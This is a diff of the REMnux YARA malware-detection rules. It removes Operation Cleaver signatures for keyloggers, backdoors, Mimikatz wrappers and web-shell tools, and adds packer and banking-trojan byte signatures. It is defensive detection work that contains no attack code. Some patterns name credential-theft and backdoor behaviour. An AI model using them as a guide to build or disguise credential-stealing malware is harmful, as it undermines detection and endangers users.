-		$s3 = "WARNNING: Gateway IP can not be found"
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_LoggerModule
-{
-	meta:
-		description = "Keylogger used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "%s-%02d%02d%02d%02d%02d.r"
-		$s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_NetC
-{
-	meta:
-		description = "Net Crawler used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "NetC.exe" wide
-		$s2 = "Net Service"
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_ShellCreator2
-{
-	meta:
-		description = "Shell Creator used by attackers in Operation Cleaver to create ASPX web shells"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "ShellCreator2.Properties"
-		$s2 = "set_IV"
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_SmartCopy2
-{
-	meta:
-		description = "Malware or hack tool used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "SmartCopy2.Properties"
-		$s2 = "ZhuFrameWork"
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_SynFlooder
-{
-	meta:
-		description = "Malware or hack tool used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "Unable to resolve [ %s ]. ErrorCode %d"
-		$s2 = "your target’s IP is : %s"
-		$s3 = "Raw TCP Socket Created successfully."
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_TinyZBot
-{
-	meta:
-		description = "Tiny Bot used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "NetScp" wide
-		$s2 = "TinyZBot.Properties.Resources.resources"
-		$s3 = "Aoao WaterMark"
-		$s4 = "Run_a_exe"
-		$s5 = "netscp.exe"
-		$s6 = "get_MainModule_WebReference_DefaultWS"
-		$s7 = "remove_CheckFileMD5Completed"
-		$s8 = "http://tempuri.org/"
-		$s9 = "Zhoupin_Cleaver"
-	condition:
-		(($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or $s9)
-}
-
-rule OPCLEAVER_ZhoupinExploitCrew
-{
-	meta:
-		description = "Keywords used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "zhoupin exploit crew" nocase
-		$s2 = "zhopin exploit crew" nocase
-	condition:
-		1 of them
-}
-
-rule OPCLEAVER_antivirusdetector
-{
-	meta:
-		description = "Hack tool used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "getShadyProcess"
-		$s2 = "getSystemAntiviruses"
-		$s3 = "AntiVirusDetector"
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_csext
-{
-	meta:
-		description = "Backdoor used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "COM+ System Extentions"
-		$s2 = "csext.exe"
-		$s3 = "COM_Extentions_bin"
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_kagent
-{
-	meta:
-		description = "Backdoor used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "kill command is in last machine, going back"
-		$s2 = "message data length in B64: %d Bytes"
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_mimikatzWrapper
-{
-	meta:
-		description = "Mimikatz Wrapper used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "mimikatzWrapper"
-		$s2 = "get_mimikatz"
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_pvz_in
-{
-	meta:
-		description = "Parviz tool used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "LAST_TIME=00/00/0000:00:00PM$"
-		$s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_pvz_out
-{
-	meta:
-		description = "Parviz tool used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "Network Connectivity Module" wide
-		$s2 = "OSPPSVC" wide
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_wndTest
-{
-	meta:
-		description = "Backdoor used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "[Alt]" wide
-		$s2 = "<< %s >>:" wide
-		$s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_zhCat
-{
-	meta:
-		description = "Network tool used by Iranian hackers and used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "Mozilla/4.0 ( compatible; MSIE 7.0; AOL 8.0 )" ascii fullword
-		$s2 = "ABC ( A Big Company )" wide fullword
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_zhLookUp
-{
-	meta:
-		description = "Hack tool used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "zhLookUp.Properties"
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_zhmimikatz
-{
-	meta:
-		description = "Mimikatz wrapper used by attackers in Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Cylance Inc."
-		score = "70"
-	strings:
-		$s1 = "MimikatzRunner"
-		$s2 = "zhmimikatz"
-	condition:
-		all of them
-}
-
-rule OPCLEAVER_Parviz_Developer
-{
-	meta:
-		description = "Parviz developer known from Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Florian Roth"
-		score = "70"
-	strings:
-		$s1 = "Users\\parviz\\documents\\" nocase
-	condition:
-		$s1 
-}
-
-rule OPCLEAVER_CCProxy_Config
-{
-	meta:
-		description = "CCProxy config known from Operation Cleaver"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		date = "2014/12/02"
-		author = "Florian Roth"
-		score = "70"
-	strings:
-		$s1 = "UserName=User-001" fullword ascii
-		$s2 = "Web=1" fullword ascii
-		$s3 = "Mail=1" fullword ascii
-		$s4 = "FTP=0" fullword ascii
-		$x1 = "IPAddressLow=78.109.194.114" fullword ascii
-	condition:
-		all of ($s*) or $x1 
-}
diff -Nru remnux-rules-0.0.3/yara/packer.yar remnux-rules-0.0.4/yara/packer.yar
--- remnux-rules-0.0.3/yara/packer.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/packer.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,20205 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule silent_banker : banker
+{
+      meta:
+		author="malware-lu"
+    strings: 
+        $a = {6A 40 68 00 30 00 00 6A 14 8D 91}  
+        $b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}
+        $c = "UVODFRYSIHLNWPEJXQZAKCBGMT"
+
+    condition:
+        $a or $b or $c
+}
+
+rule zbot : banker
+{
+      meta:
+		author="malware-lu"
+     strings: 
+        $a = "__SYSTEM__" wide
+        $b = "*tanentry*"
+        $c = "*<option"
+        $d = "*<select"
+        $e = "*<input"
+
+     condition:
+        ($a and $b) or ($c and $d and $e)
+}
+
+rule banbra : banker
+{
+      meta:
+		author="malware-lu"
+    strings: 
+        $a = "senha" fullword nocase
+        $b = "cartao" fullword nocase
+        $c = "caixa" 
+        $d = "login" fullword nocase
+        $e = ".com.br"
+
+     condition:
+        #a > 3 and #b > 3 and #c > 3 and #d > 3 and #e > 3              
+}
+
+rule Borland 
+{
+      meta:
+		author="malware-lu"
+	strings:
+		$patternBorland = "Borland" wide ascii
+	condition:
+		$patternBorland 
+}
+
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule java 
+{
+      meta:
+		author="malware-lu"
+	strings:
+		$patternjava = "java" wide ascii
+	condition:
+		$patternjava
+}
+*/
+rule MSLRHv032afakePCGuard4xxemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 55 50 E8 00 00 00 00 5D EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 58 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EnigmaProtector1XSukhovVladimirSergeNMarkin
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 00 00 00 52 65 67 43 6C 6F 73 65 4B 65 79 00 00 00 53 79 73 46 72 65 65 53 74 72 69 6E 67 00 00 00 43 72 65 61 74 65 46 6F 6E 74 41 00 00 00 53 68 65 6C 6C 45 78 65 63 75 74 65 41 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule SPLayerv008
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8D 40 00 B9 ?? ?? ?? ?? 6A ?? 58 C0 0C ?? ?? 48 ?? ?? 66 13 F0 91 3B D9 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule DxPackV086Dxd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 8B FD 81 ED 06 10 40 00 2B BD 94 12 40 00 81 EF 06 00 00 00 83 BD 14 13 40 00 01 0F 84 2F 01 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualC60
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 }
+	$a1 = { 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE }
+	$a2 = { 91 EB 02 CD 20 BF 50 BC 04 6F 91 BE D0 ?? ?? 6F EB 02 CD 20 2B F7 EB 02 F0 46 8D 1D F4 00 }
+	$a3 = { C1 CE 10 C1 F6 0F 68 00 ?? ?? 00 2B FA 5B 23 F9 8D 15 80 ?? ?? 00 E8 01 00 00 00 B6 5E 0B }
+	$a4 = { D1 E9 03 C0 68 80 ?? ?? 00 EB 02 CD 20 5E 40 BB F4 00 00 00 33 CA 2B C7 0F B6 16 EB 01 3E }
+	$a5 = { E8 01 00 00 00 0E 59 E8 01 00 00 00 58 58 BE 80 ?? ?? 00 EB 02 61 E9 68 F4 00 00 00 C1 C8 }
+	$a6 = { EB 01 4D 83 F6 4C 68 80 ?? ?? 00 EB 02 CD 20 5B EB 01 23 68 48 1C 2B 3A E8 02 00 00 00 38 }
+	$a7 = { EB 02 AB 35 EB 02 B5 C6 8D 05 80 ?? ?? 00 C1 C2 11 BE F4 00 00 00 F7 DB F7 DB 0F BE 38 E8 }
+	$a8 = { EB 02 CD 20 ?? CF ?? ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 }
+	$a9 = { F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? ?? BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point or $a3 at pe.entry_point or $a4 at pe.entry_point or $a5 at pe.entry_point or $a6 at pe.entry_point or $a7 at pe.entry_point or $a8 at pe.entry_point or $a9 at pe.entry_point
+}
+	
+	
+rule TPPpackclane
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5D 81 ED F5 8F 40 00 60 33 ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualC6070
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? 00 EB 02 CD 20 03 D3 8D 35 F4 00 00 00 EB 01 35 EB 01 88 80 CA 7C 80 F3 74 8B 38 EB 02 AC BA 03 DB E8 01 00 00 00 A5 5B C1 C2 0B 81 C7 DA 10 0A 4E EB 01 08 2B D1 83 EF 14 EB 02 CD 20 33 D3 83 EF 27 }
+	$a1 = { 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? ?? EB 02 CD 20 03 D3 8D 35 F4 00 }
+	$a2 = { 87 FE E8 02 00 00 00 98 CC 5F BB 80 ?? ?? 00 EB 02 CD 20 68 F4 00 00 00 E8 01 00 00 00 E3 }
+	$a3 = { F7 D8 40 49 EB 02 E0 0A 8D 35 80 ?? ?? ?? 0F B6 C2 EB 01 9C 8D 1D F4 00 00 00 EB 01 3C 80 }
+	$a4 = { F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? A7 BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point or $a3 at pe.entry_point or $a4 at pe.entry_point
+}
+	
+	
+rule Thinstall24x25xJititSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? BD ?? ?? ?? ?? 03 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule LocklessIntroPack
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2C E8 ?? ?? ?? ?? 5D 8B C5 81 ED F6 73 ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 06 89 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03faketElock061FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E9 00 00 00 00 60 E8 00 00 00 00 58 83 C0 08 F3 EB FF E0 83 C0 28 50 E8 00 00 00 00 5E B3 33 8D 46 0E 8D 76 31 28 18 F8 73 00 C3 8B FE B9 3C 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeStealth275aWebtoolMaster
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEArmor046Hying
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 AA 00 00 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 3D ?? ?? 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B ?? ?? 00 5C ?? ?? 00 6F ?? ?? 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 }
+	$a1 = { E8 AA 00 00 00 2D ?? ?? ?? 00 00 00 00 00 00 00 00 3D }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule eXPressorv13CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 45 78 50 72 2D 76 2E 31 2E 33 2E }
+	$a1 = { 55 8B EC 83 EC ?? 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 33 2E 2E B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 13 A1 ?? ?? ?? ?? 03 05 ?? ?? ?? ?? 89 ?? ?? E9 ?? ?? 00 00 C7 05 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule Upackv032BetaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 ?? ?? AD 50 ?? ?? AD 91 F3 A5 }
+	$a1 = { BE 88 01 ?? ?? AD 50 ?? AD 91 ?? F3 A5 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule MSLRHV031emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 D1 CB 0F CA C1 CA E0 D1 CA 0F C8 EB 01 F1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv184
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCGuardforWin32v500SofProBlagojeCeklic
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 55 50 E8 00 00 00 00 5D 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 B8 ?? ?? ?? 00 EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 2B E8 9C EB 01 D5 9D EB 01 0B 58 60 E8 03 00 00 00 83 EB 0E EB 01 0C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WiseInstallerStub
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 78 05 00 00 53 56 BE 04 01 00 00 57 8D 85 94 FD FF FF 56 33 DB 50 53 FF 15 34 20 40 00 8D 85 94 FD FF FF 56 50 8D 85 94 FD FF FF 50 FF 15 30 20 40 00 8B 3D 2C 20 40 00 53 53 6A 03 53 6A 01 8D 85 94 FD FF FF 68 00 00 00 80 50 FF D7 83 F8 FF }
+	$a1 = { 55 8B EC 81 EC ?? 04 00 00 53 56 57 6A ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? 40 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? 20 }
+	$a2 = { 55 8B EC 81 EC ?? ?? 00 00 53 56 57 6A 01 5E 6A 04 89 75 E8 FF 15 ?? 40 40 00 FF 15 ?? 40 40 00 8B F8 89 7D ?? 8A 07 3C 22 0F 85 ?? 00 00 00 8A 47 01 47 89 7D ?? 33 DB 3A C3 74 0D 3C 22 74 09 8A 47 01 47 89 7D ?? EB EF 80 3F 22 75 04 47 89 7D ?? 80 3F 20 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2
+}
+	
+	
+rule AnskyaNTPackerGeneratorAnskya
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 B8 88 1D 00 10 E8 C7 FA FF FF 6A 0A 68 20 1E 00 10 A1 14 31 00 10 50 E8 71 FB FF FF 8B D8 85 DB 74 2F 53 A1 14 31 00 10 50 E8 97 FB FF FF 85 C0 74 1F 53 A1 14 31 00 10 50 E8 5F FB FF FF 85 C0 74 0F 50 E8 5D FB FF FF 85 C0 74 05 E8 70 FC FF FF 5B E8 F2 F6 FF FF 00 00 48 45 41 52 54 }
+
+condition:
+		$a0
+}
+	
+	
+rule ThinstallVirtualizationSuite30493080ThinstallCompany
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 2C 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 }
+	$a1 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 2C 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule NsPack14byNorthStarLiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 }
+
+condition:
+		$a0
+}
+	
+	
+rule FSGv110EngbartxtWatcomCCEXE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 CD 20 03 ?? 8D ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AcidCrypt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 B9 ?? ?? ?? 00 BA ?? ?? ?? 00 BE ?? ?? ?? 00 02 38 40 4E 75 FA 8B C2 8A 18 32 DF C0 CB }
+	$a1 = { BE ?? ?? ?? ?? 02 38 40 4E 75 FA 8B C2 8A 18 32 DF C0 CB }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule eXPressorv1451CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 34 2E 00 A1 00 ?? ?? ?? 05 00 ?? ?? ?? A3 08 ?? ?? ?? A1 08 ?? ?? ?? B9 81 ?? ?? ?? 2B 48 18 89 0D 0C ?? ?? ?? 83 3D 10 ?? ?? ?? 00 74 16 A1 08 ?? ?? ?? 8B 0D 0C ?? ?? ?? 03 48 14 }
+	$a1 = { 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 34 2E 00 A1 00 ?? ?? ?? 05 00 ?? ?? ?? A3 08 ?? ?? ?? A1 08 ?? ?? ?? B9 81 ?? ?? ?? 2B 48 18 89 0D 0C ?? ?? ?? 83 3D 10 ?? ?? ?? 00 74 16 A1 08 ?? ?? ?? 8B 0D 0C ?? ?? ?? 03 48 14 89 4D CC }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule BeRoEXEPackerv100LZMABeRoFarbrausch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 04 00 00 00 8B F9 81 FE ?? ?? ?? ?? 7F 10 AC 47 04 18 2C 02 73 F0 29 3E 03 F1 03 F9 EB E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PackanoidArkanoid
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF 00 10 40 00 BE ?? ?? ?? 00 E8 9D 00 00 00 B8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DAEMONProtectv067
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 60 9C 8C C9 32 C9 E3 0C 52 0F 01 4C 24 FE 5A 83 C2 0C 8B 1A 9D 61 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EmbedPEV100V124cyclotron
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule VProtectorV10Avcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 8A 8E 40 00 68 C6 8E 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPE2200481022005314WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 7A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02JDPack1xJDProtect09Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
